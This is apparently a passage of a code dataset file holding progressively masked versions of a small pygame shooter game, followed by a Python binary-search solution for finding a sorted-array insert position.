token>\npygame.init()\n<assignment token>\n\n\nclass Player:\n\n def __init__(self):\n self.x = 275\n self.y = 275\n self.image = pygame.image.load('player.jpg')\n self.image1 = pygame.image.load('hearts.png')\n self.lives = 5\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n\n 
def rotate(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n sin = oppos / hypot\n radians = math.asin(sin)\n angle = radians * (180 / 3.14)\n if x > self.x:\n if y > self.y:\n angle -= angle + angle\n if x < self.x:\n angle = 180 + (angle - (angle + angle))\n if y > self.y:\n angle -= angle + angle\n return angle - 90\n\n\nclass Bullet:\n\n def __init__(self, color):\n self.x = 0\n self.y = 0\n self.angle = 0\n self.color = color\n\n def draw(self):\n pygame.draw.rect(scr, self.color, pygame.Rect(self.x, self.y, 5, 5))\n\n\nclass Gun:\n\n def __init__(self):\n self.x = 0\n self.y = 0\n self.bullets = []\n self.bullets2 = []\n\n def shoot1(self, x, y, angle):\n self.bullets.append(Bullet((0, 255, 255)))\n self.bullets[-1].x = x\n self.bullets[-1].y = y\n self.bullets[-1].angle = angle\n\n def shoot2(self, x, y, angle):\n self.bullets2.append(Bullet((255, 255, 0)))\n self.bullets2[-1].x = x\n self.bullets2[-1].y = y\n self.bullets2[-1].angle = angle\n\n\nclass Enemy:\n\n def __init__(self):\n self.x = 100\n self.y = 100\n self.speed = 2\n self.hearts = 3\n self.image = pygame.image.load('enemy.png')\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n\n def rotate(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n sin = oppos / hypot\n radians = math.asin(sin)\n angle = radians * (180 / 3.14)\n if x > self.x:\n if y > self.y:\n angle -= angle + angle\n if x < self.x:\n angle = 180 + (angle - (angle + angle))\n if y > self.y:\n angle -= angle + angle\n return angle - 90\n\n def distance(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n return hypot\n\n def spawn(self):\n enemies.append(Enemy())\n enemies[-1].x = random.randint(0, 600)\n enemies[-1].y = random.randint(0, 600)\n\n\n<assignment token>\ncmd.spawn()\ncmd.spawn()\n<assignment token>\nwhile True:\n frames += 1\n scr.fill((0, 0, 0))\n for event in pygame.event.get():\n key = pygame.key.get_pressed()\n Mpos = pygame.mouse.get_pos()\n if event.type == 5:\n gun.shoot1(player.x + 12.5, player.y + 12.5, angle)\n for i in range(0, player.lives):\n scr.blit(player.image1, (i * 35, 1))\n for i in range(len(gun.bullets)):\n try:\n gun.bullets[i].x = gun.bullets[i].x + 4 * math.cos(math.radians\n (gun.bullets[i].angle + 90))\n gun.bullets[i].y = gun.bullets[i].y + 4 * math.sin(math.radians\n (gun.bullets[i].angle - 90))\n if gun.bullets[i].x > 600:\n del gun.bullets[i]\n if gun.bullets[i].x < 0:\n del gun.bullets[i]\n if gun.bullets[i].y > 600:\n del gun.bullets[i]\n if gun.bullets[i].y < 0:\n del gun.bullets[i]\n gun.bullets[i].draw()\n except IndexError:\n pass\n for i in range(len(gun.bullets2)):\n try:\n gun.bullets2[i].x = gun.bullets2[i].x + 4 * math.cos(math.\n radians(gun.bullets2[i].angle + 90))\n gun.bullets2[i].y = gun.bullets2[i].y + 4 * math.sin(math.\n radians(gun.bullets2[i].angle - 90))\n if gun.bullets2[i].x > 600:\n del gun.bullets2[i]\n if gun.bullets2[i].x < 0:\n del gun.bullets2[i]\n if gun.bullets2[i].y > 600:\n del gun.bullets2[i]\n if gun.bullets2[i].y < 0:\n del gun.bullets2[i]\n gun.bullets2[i].draw()\n except IndexError:\n pass\n for i in range(len(enemies)):\n if enemies[i].distance(player.x, player.y) > 100:\n enemies[i].x = enemies[i].x + enemies[i].speed * math.cos(math.\n radians(enemies[i].rotate(player.x, player.y) + 90))\n enemies[i].y = enemies[i].y + enemies[i].speed * math.sin(math.\n 
radians(enemies[i].rotate(player.x, player.y) - 90))\n enemies[i].image = pygame.image.load('enemy.png').convert()\n enemies[i].image = enemies[i].image.copy()\n enemies[i].image = pygame.transform.rotate(enemies[i].image,\n enemies[i].rotate(player.x, player.y))\n angle2 = enemies[i].rotate(player.x, player.y)\n if frames % 100 == 0:\n gun.shoot2(enemies[i].x + 12.5, enemies[i].y + 12.5, angle2)\n enemies[i].draw()\n for j in range(len(gun.bullets)):\n for i in range(len(gun.bullets)):\n try:\n if gun.bullets[j].x > enemies[i].x and gun.bullets[j\n ].x < enemies[i].x + 25 and gun.bullets[j].y > enemies[i\n ].y and gun.bullets[j].y < enemies[i].y + 25:\n del enemies[i]\n except IndexError:\n pass\n for j in range(len(gun.bullets2)):\n for i in range(len(gun.bullets2)):\n try:\n if gun.bullets2[j].x > player.x and gun.bullets2[j\n ].x < player.x + 25 and gun.bullets2[j\n ].y > player.y and gun.bullets2[j].y < player.y + 25:\n for i in range(len(hit) - 1):\n if not (hit[i].x > player.x or hit[i].x < player.x +\n 25 or hit[i].y > player.y or hit[i].y < player.y):\n del hit[i]\n if hit.count(gun.bullets2[j]) == 0:\n hit.append(gun.bullets2[j])\n player.lives = 5 - len(hit)\n except IndexError:\n pass\n if key[pygame.K_a]:\n player.x -= 3\n if key[pygame.K_d]:\n player.x += 3\n if key[pygame.K_w]:\n player.y -= 3\n if key[pygame.K_s]:\n player.y += 3\n if frames % 150 == 0:\n cmd.spawn()\n if player.lives < 1:\n pygame.quit()\n break\n player.image = pygame.image.load('player.jpg').convert()\n player.image = player.image.copy()\n player.image = pygame.transform.rotate(player.image, player.rotate(Mpos\n [0], Mpos[1]))\n angle = player.rotate(Mpos[0], Mpos[1])\n player.draw()\n pygame.display.update()\n time.sleep(0.005)\nquit()\n", "<import token>\n<code token>\n<assignment token>\n\n\nclass Player:\n\n def __init__(self):\n self.x = 275\n self.y = 275\n self.image = pygame.image.load('player.jpg')\n self.image1 = pygame.image.load('hearts.png')\n self.lives = 5\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n\n def rotate(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n sin = oppos / hypot\n radians = math.asin(sin)\n angle = radians * (180 / 3.14)\n if x > self.x:\n if y > self.y:\n angle -= angle + angle\n if x < self.x:\n angle = 180 + (angle - (angle + angle))\n if y > self.y:\n angle -= angle + angle\n return angle - 90\n\n\nclass Bullet:\n\n def __init__(self, color):\n self.x = 0\n self.y = 0\n self.angle = 0\n self.color = color\n\n def draw(self):\n pygame.draw.rect(scr, self.color, pygame.Rect(self.x, self.y, 5, 5))\n\n\nclass Gun:\n\n def __init__(self):\n self.x = 0\n self.y = 0\n self.bullets = []\n self.bullets2 = []\n\n def shoot1(self, x, y, angle):\n self.bullets.append(Bullet((0, 255, 255)))\n self.bullets[-1].x = x\n self.bullets[-1].y = y\n self.bullets[-1].angle = angle\n\n def shoot2(self, x, y, angle):\n self.bullets2.append(Bullet((255, 255, 0)))\n self.bullets2[-1].x = x\n self.bullets2[-1].y = y\n self.bullets2[-1].angle = angle\n\n\nclass Enemy:\n\n def __init__(self):\n self.x = 100\n self.y = 100\n self.speed = 2\n self.hearts = 3\n self.image = pygame.image.load('enemy.png')\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n\n def rotate(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n sin = oppos / hypot\n radians = math.asin(sin)\n angle = radians * (180 / 3.14)\n if x > self.x:\n if y > self.y:\n angle -= 
angle + angle\n if x < self.x:\n angle = 180 + (angle - (angle + angle))\n if y > self.y:\n angle -= angle + angle\n return angle - 90\n\n def distance(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n return hypot\n\n def spawn(self):\n enemies.append(Enemy())\n enemies[-1].x = random.randint(0, 600)\n enemies[-1].y = random.randint(0, 600)\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<assignment token>\n\n\nclass Player:\n <function token>\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n\n def rotate(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n sin = oppos / hypot\n radians = math.asin(sin)\n angle = radians * (180 / 3.14)\n if x > self.x:\n if y > self.y:\n angle -= angle + angle\n if x < self.x:\n angle = 180 + (angle - (angle + angle))\n if y > self.y:\n angle -= angle + angle\n return angle - 90\n\n\nclass Bullet:\n\n def __init__(self, color):\n self.x = 0\n self.y = 0\n self.angle = 0\n self.color = color\n\n def draw(self):\n pygame.draw.rect(scr, self.color, pygame.Rect(self.x, self.y, 5, 5))\n\n\nclass Gun:\n\n def __init__(self):\n self.x = 0\n self.y = 0\n self.bullets = []\n self.bullets2 = []\n\n def shoot1(self, x, y, angle):\n self.bullets.append(Bullet((0, 255, 255)))\n self.bullets[-1].x = x\n self.bullets[-1].y = y\n self.bullets[-1].angle = angle\n\n def shoot2(self, x, y, angle):\n self.bullets2.append(Bullet((255, 255, 0)))\n self.bullets2[-1].x = x\n self.bullets2[-1].y = y\n self.bullets2[-1].angle = angle\n\n\nclass Enemy:\n\n def __init__(self):\n self.x = 100\n self.y = 100\n self.speed = 2\n self.hearts = 3\n self.image = pygame.image.load('enemy.png')\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n\n def rotate(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n sin = oppos / hypot\n radians = math.asin(sin)\n angle = radians * (180 / 3.14)\n if x > self.x:\n if y > self.y:\n angle -= angle + angle\n if x < self.x:\n angle = 180 + (angle - (angle + angle))\n if y > self.y:\n angle -= angle + angle\n return angle - 90\n\n def distance(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n return hypot\n\n def spawn(self):\n enemies.append(Enemy())\n enemies[-1].x = random.randint(0, 600)\n enemies[-1].y = random.randint(0, 600)\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<assignment token>\n\n\nclass Player:\n <function token>\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n <function token>\n\n\nclass Bullet:\n\n def __init__(self, color):\n self.x = 0\n self.y = 0\n self.angle = 0\n self.color = color\n\n def draw(self):\n pygame.draw.rect(scr, self.color, pygame.Rect(self.x, self.y, 5, 5))\n\n\nclass Gun:\n\n def __init__(self):\n self.x = 0\n self.y = 0\n self.bullets = []\n self.bullets2 = []\n\n def shoot1(self, x, y, angle):\n self.bullets.append(Bullet((0, 255, 255)))\n self.bullets[-1].x = x\n self.bullets[-1].y = y\n self.bullets[-1].angle = angle\n\n def shoot2(self, x, y, angle):\n self.bullets2.append(Bullet((255, 255, 0)))\n self.bullets2[-1].x = x\n self.bullets2[-1].y = y\n self.bullets2[-1].angle = angle\n\n\nclass Enemy:\n\n def __init__(self):\n self.x = 100\n self.y = 100\n self.speed = 2\n self.hearts = 3\n self.image = 
pygame.image.load('enemy.png')\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n\n def rotate(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n sin = oppos / hypot\n radians = math.asin(sin)\n angle = radians * (180 / 3.14)\n if x > self.x:\n if y > self.y:\n angle -= angle + angle\n if x < self.x:\n angle = 180 + (angle - (angle + angle))\n if y > self.y:\n angle -= angle + angle\n return angle - 90\n\n def distance(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n return hypot\n\n def spawn(self):\n enemies.append(Enemy())\n enemies[-1].x = random.randint(0, 600)\n enemies[-1].y = random.randint(0, 600)\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<assignment token>\n\n\nclass Player:\n <function token>\n <function token>\n <function token>\n\n\nclass Bullet:\n\n def __init__(self, color):\n self.x = 0\n self.y = 0\n self.angle = 0\n self.color = color\n\n def draw(self):\n pygame.draw.rect(scr, self.color, pygame.Rect(self.x, self.y, 5, 5))\n\n\nclass Gun:\n\n def __init__(self):\n self.x = 0\n self.y = 0\n self.bullets = []\n self.bullets2 = []\n\n def shoot1(self, x, y, angle):\n self.bullets.append(Bullet((0, 255, 255)))\n self.bullets[-1].x = x\n self.bullets[-1].y = y\n self.bullets[-1].angle = angle\n\n def shoot2(self, x, y, angle):\n self.bullets2.append(Bullet((255, 255, 0)))\n self.bullets2[-1].x = x\n self.bullets2[-1].y = y\n self.bullets2[-1].angle = angle\n\n\nclass Enemy:\n\n def __init__(self):\n self.x = 100\n self.y = 100\n self.speed = 2\n self.hearts = 3\n self.image = pygame.image.load('enemy.png')\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n\n def rotate(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n sin = oppos / hypot\n radians = math.asin(sin)\n angle = radians * (180 / 3.14)\n if x > self.x:\n if y > self.y:\n angle -= angle + angle\n if x < self.x:\n angle = 180 + (angle - (angle + angle))\n if y > self.y:\n angle -= angle + angle\n return angle - 90\n\n def distance(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n return hypot\n\n def spawn(self):\n enemies.append(Enemy())\n enemies[-1].x = random.randint(0, 600)\n enemies[-1].y = random.randint(0, 600)\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<assignment token>\n<class token>\n\n\nclass Bullet:\n\n def __init__(self, color):\n self.x = 0\n self.y = 0\n self.angle = 0\n self.color = color\n\n def draw(self):\n pygame.draw.rect(scr, self.color, pygame.Rect(self.x, self.y, 5, 5))\n\n\nclass Gun:\n\n def __init__(self):\n self.x = 0\n self.y = 0\n self.bullets = []\n self.bullets2 = []\n\n def shoot1(self, x, y, angle):\n self.bullets.append(Bullet((0, 255, 255)))\n self.bullets[-1].x = x\n self.bullets[-1].y = y\n self.bullets[-1].angle = angle\n\n def shoot2(self, x, y, angle):\n self.bullets2.append(Bullet((255, 255, 0)))\n self.bullets2[-1].x = x\n self.bullets2[-1].y = y\n self.bullets2[-1].angle = angle\n\n\nclass Enemy:\n\n def __init__(self):\n self.x = 100\n self.y = 100\n self.speed = 2\n self.hearts = 3\n self.image = pygame.image.load('enemy.png')\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n\n def rotate(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - 
self.x)\n hypot = math.hypot(oppos, adjac)\n sin = oppos / hypot\n radians = math.asin(sin)\n angle = radians * (180 / 3.14)\n if x > self.x:\n if y > self.y:\n angle -= angle + angle\n if x < self.x:\n angle = 180 + (angle - (angle + angle))\n if y > self.y:\n angle -= angle + angle\n return angle - 90\n\n def distance(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n return hypot\n\n def spawn(self):\n enemies.append(Enemy())\n enemies[-1].x = random.randint(0, 600)\n enemies[-1].y = random.randint(0, 600)\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<assignment token>\n<class token>\n\n\nclass Bullet:\n\n def __init__(self, color):\n self.x = 0\n self.y = 0\n self.angle = 0\n self.color = color\n <function token>\n\n\nclass Gun:\n\n def __init__(self):\n self.x = 0\n self.y = 0\n self.bullets = []\n self.bullets2 = []\n\n def shoot1(self, x, y, angle):\n self.bullets.append(Bullet((0, 255, 255)))\n self.bullets[-1].x = x\n self.bullets[-1].y = y\n self.bullets[-1].angle = angle\n\n def shoot2(self, x, y, angle):\n self.bullets2.append(Bullet((255, 255, 0)))\n self.bullets2[-1].x = x\n self.bullets2[-1].y = y\n self.bullets2[-1].angle = angle\n\n\nclass Enemy:\n\n def __init__(self):\n self.x = 100\n self.y = 100\n self.speed = 2\n self.hearts = 3\n self.image = pygame.image.load('enemy.png')\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n\n def rotate(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n sin = oppos / hypot\n radians = math.asin(sin)\n angle = radians * (180 / 3.14)\n if x > self.x:\n if y > self.y:\n angle -= angle + angle\n if x < self.x:\n angle = 180 + (angle - (angle + angle))\n if y > self.y:\n angle -= angle + angle\n return angle - 90\n\n def distance(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n return hypot\n\n def spawn(self):\n enemies.append(Enemy())\n enemies[-1].x = random.randint(0, 600)\n enemies[-1].y = random.randint(0, 600)\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<assignment token>\n<class token>\n\n\nclass Bullet:\n <function token>\n <function token>\n\n\nclass Gun:\n\n def __init__(self):\n self.x = 0\n self.y = 0\n self.bullets = []\n self.bullets2 = []\n\n def shoot1(self, x, y, angle):\n self.bullets.append(Bullet((0, 255, 255)))\n self.bullets[-1].x = x\n self.bullets[-1].y = y\n self.bullets[-1].angle = angle\n\n def shoot2(self, x, y, angle):\n self.bullets2.append(Bullet((255, 255, 0)))\n self.bullets2[-1].x = x\n self.bullets2[-1].y = y\n self.bullets2[-1].angle = angle\n\n\nclass Enemy:\n\n def __init__(self):\n self.x = 100\n self.y = 100\n self.speed = 2\n self.hearts = 3\n self.image = pygame.image.load('enemy.png')\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n\n def rotate(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n sin = oppos / hypot\n radians = math.asin(sin)\n angle = radians * (180 / 3.14)\n if x > self.x:\n if y > self.y:\n angle -= angle + angle\n if x < self.x:\n angle = 180 + (angle - (angle + angle))\n if y > self.y:\n angle -= angle + angle\n return angle - 90\n\n def distance(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n return hypot\n\n def 
spawn(self):\n enemies.append(Enemy())\n enemies[-1].x = random.randint(0, 600)\n enemies[-1].y = random.randint(0, 600)\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n\n\nclass Gun:\n\n def __init__(self):\n self.x = 0\n self.y = 0\n self.bullets = []\n self.bullets2 = []\n\n def shoot1(self, x, y, angle):\n self.bullets.append(Bullet((0, 255, 255)))\n self.bullets[-1].x = x\n self.bullets[-1].y = y\n self.bullets[-1].angle = angle\n\n def shoot2(self, x, y, angle):\n self.bullets2.append(Bullet((255, 255, 0)))\n self.bullets2[-1].x = x\n self.bullets2[-1].y = y\n self.bullets2[-1].angle = angle\n\n\nclass Enemy:\n\n def __init__(self):\n self.x = 100\n self.y = 100\n self.speed = 2\n self.hearts = 3\n self.image = pygame.image.load('enemy.png')\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n\n def rotate(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n sin = oppos / hypot\n radians = math.asin(sin)\n angle = radians * (180 / 3.14)\n if x > self.x:\n if y > self.y:\n angle -= angle + angle\n if x < self.x:\n angle = 180 + (angle - (angle + angle))\n if y > self.y:\n angle -= angle + angle\n return angle - 90\n\n def distance(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n return hypot\n\n def spawn(self):\n enemies.append(Enemy())\n enemies[-1].x = random.randint(0, 600)\n enemies[-1].y = random.randint(0, 600)\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n\n\nclass Gun:\n <function token>\n\n def shoot1(self, x, y, angle):\n self.bullets.append(Bullet((0, 255, 255)))\n self.bullets[-1].x = x\n self.bullets[-1].y = y\n self.bullets[-1].angle = angle\n\n def shoot2(self, x, y, angle):\n self.bullets2.append(Bullet((255, 255, 0)))\n self.bullets2[-1].x = x\n self.bullets2[-1].y = y\n self.bullets2[-1].angle = angle\n\n\nclass Enemy:\n\n def __init__(self):\n self.x = 100\n self.y = 100\n self.speed = 2\n self.hearts = 3\n self.image = pygame.image.load('enemy.png')\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n\n def rotate(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n sin = oppos / hypot\n radians = math.asin(sin)\n angle = radians * (180 / 3.14)\n if x > self.x:\n if y > self.y:\n angle -= angle + angle\n if x < self.x:\n angle = 180 + (angle - (angle + angle))\n if y > self.y:\n angle -= angle + angle\n return angle - 90\n\n def distance(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n return hypot\n\n def spawn(self):\n enemies.append(Enemy())\n enemies[-1].x = random.randint(0, 600)\n enemies[-1].y = random.randint(0, 600)\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n\n\nclass Gun:\n <function token>\n <function token>\n\n def shoot2(self, x, y, angle):\n self.bullets2.append(Bullet((255, 255, 0)))\n self.bullets2[-1].x = x\n self.bullets2[-1].y = y\n self.bullets2[-1].angle = angle\n\n\nclass Enemy:\n\n def __init__(self):\n self.x = 100\n self.y = 100\n self.speed = 2\n self.hearts = 3\n self.image = pygame.image.load('enemy.png')\n\n def draw(self):\n 
scr.blit(self.image, (self.x, self.y))\n\n def rotate(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n sin = oppos / hypot\n radians = math.asin(sin)\n angle = radians * (180 / 3.14)\n if x > self.x:\n if y > self.y:\n angle -= angle + angle\n if x < self.x:\n angle = 180 + (angle - (angle + angle))\n if y > self.y:\n angle -= angle + angle\n return angle - 90\n\n def distance(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n return hypot\n\n def spawn(self):\n enemies.append(Enemy())\n enemies[-1].x = random.randint(0, 600)\n enemies[-1].y = random.randint(0, 600)\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n\n\nclass Gun:\n <function token>\n <function token>\n <function token>\n\n\nclass Enemy:\n\n def __init__(self):\n self.x = 100\n self.y = 100\n self.speed = 2\n self.hearts = 3\n self.image = pygame.image.load('enemy.png')\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n\n def rotate(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n sin = oppos / hypot\n radians = math.asin(sin)\n angle = radians * (180 / 3.14)\n if x > self.x:\n if y > self.y:\n angle -= angle + angle\n if x < self.x:\n angle = 180 + (angle - (angle + angle))\n if y > self.y:\n angle -= angle + angle\n return angle - 90\n\n def distance(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n return hypot\n\n def spawn(self):\n enemies.append(Enemy())\n enemies[-1].x = random.randint(0, 600)\n enemies[-1].y = random.randint(0, 600)\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n\n\nclass Enemy:\n\n def __init__(self):\n self.x = 100\n self.y = 100\n self.speed = 2\n self.hearts = 3\n self.image = pygame.image.load('enemy.png')\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n\n def rotate(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n sin = oppos / hypot\n radians = math.asin(sin)\n angle = radians * (180 / 3.14)\n if x > self.x:\n if y > self.y:\n angle -= angle + angle\n if x < self.x:\n angle = 180 + (angle - (angle + angle))\n if y > self.y:\n angle -= angle + angle\n return angle - 90\n\n def distance(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n return hypot\n\n def spawn(self):\n enemies.append(Enemy())\n enemies[-1].x = random.randint(0, 600)\n enemies[-1].y = random.randint(0, 600)\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n\n\nclass Enemy:\n\n def __init__(self):\n self.x = 100\n self.y = 100\n self.speed = 2\n self.hearts = 3\n self.image = pygame.image.load('enemy.png')\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n <function token>\n\n def distance(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n return hypot\n\n def spawn(self):\n enemies.append(Enemy())\n enemies[-1].x = random.randint(0, 600)\n enemies[-1].y = random.randint(0, 600)\n\n\n<assignment 
token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n\n\nclass Enemy:\n\n def __init__(self):\n self.x = 100\n self.y = 100\n self.speed = 2\n self.hearts = 3\n self.image = pygame.image.load('enemy.png')\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n <function token>\n\n def distance(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n return hypot\n <function token>\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n\n\nclass Enemy:\n <function token>\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n <function token>\n\n def distance(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n return hypot\n <function token>\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n\n\nclass Enemy:\n <function token>\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n <function token>\n <function token>\n <function token>\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n\n\nclass Enemy:\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n" ]
false
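
A note on the pygame record that closes above: its rotate() method derives an aiming angle from asin plus hand-written quadrant fix-ups, using 3.14 in place of math.pi. The sketch below is illustrative only (aim_angle is a made-up name; only the trailing -90 sprite offset is taken from the record) and shows that math.atan2 yields the same angle in one call, with exact degrees and all four quadrants handled.

import math

def aim_angle(src_x, src_y, dst_x, dst_y):
    # pygame's y axis grows downward, hence the sign flip on dy;
    # the trailing -90 mirrors the sprite offset used in the record.
    return math.degrees(math.atan2(-(dst_y - src_y), dst_x - src_x)) - 90

print(aim_angle(0, 0, 1, -1))  # ~ -45.0: target up and to the right
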
12
0a7ffc027511d5fbec0076f6b25a6e3bc3dfdd9b
''' Given a sorted array and a target value, return the index if the target is found. If not, return the index where it would be if it were inserted in order. You may assume no duplicates in the array. Here are few examples. [1,3,5,6], 5 -> 2 [1,3,5,6], 2 -> 1 [1,3,5,6], 7 -> 4 [1,3,5,6], 0 -> 0 ''' class Solution(object): def searchInsert(self, nums, target): if target < nums[0]: return 0 if target > nums[-1]: return len(nums) l_idx, h_idx = 0, len(nums)-1 while True: m_idx = int((l_idx+h_idx)/2) if l_idx >= h_idx: return l_idx elif target > nums[m_idx]: l_idx = m_idx + 1 else: h_idx = m_idx sol = Solution() print sol.searchInsert([1,3,5,6], 5) print sol.searchInsert([1,3,5,6], 2) print sol.searchInsert([1,3,5,6], 4) print sol.searchInsert([1,3,5,6], 0)
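
The docstring above states the problem; the driver lines use Python 2 print statements, which is presumably why this record survives below only as a single unparsed step with its error flag set. As a cross-check rather than the author's method, the same insert position comes straight from the standard library (search_insert is a hypothetical wrapper name):

import bisect

def search_insert(nums, target):
    # bisect_left returns the leftmost index at which target can be
    # inserted while keeping nums sorted -- the value the record's
    # binary search converges to.
    return bisect.bisect_left(nums, target)

print(search_insert([1, 3, 5, 6], 5))  # 2
print(search_insert([1, 3, 5, 6], 2))  # 1
print(search_insert([1, 3, 5, 6], 7))  # 4
print(search_insert([1, 3, 5, 6], 0))  # 0
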
